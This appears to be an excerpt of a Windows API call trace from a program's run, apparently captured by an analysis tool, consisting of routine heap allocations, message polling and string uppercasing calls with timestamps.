RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0263.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0263.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.969] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0263.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0263.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0263.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0263.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.973] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0263.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0263.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.978] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.978] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.979] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.979] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.980] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.980] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0263.980] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0263.980] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.981] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.981] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.981] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.983] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.983] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.983] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0263.984] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.984] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) 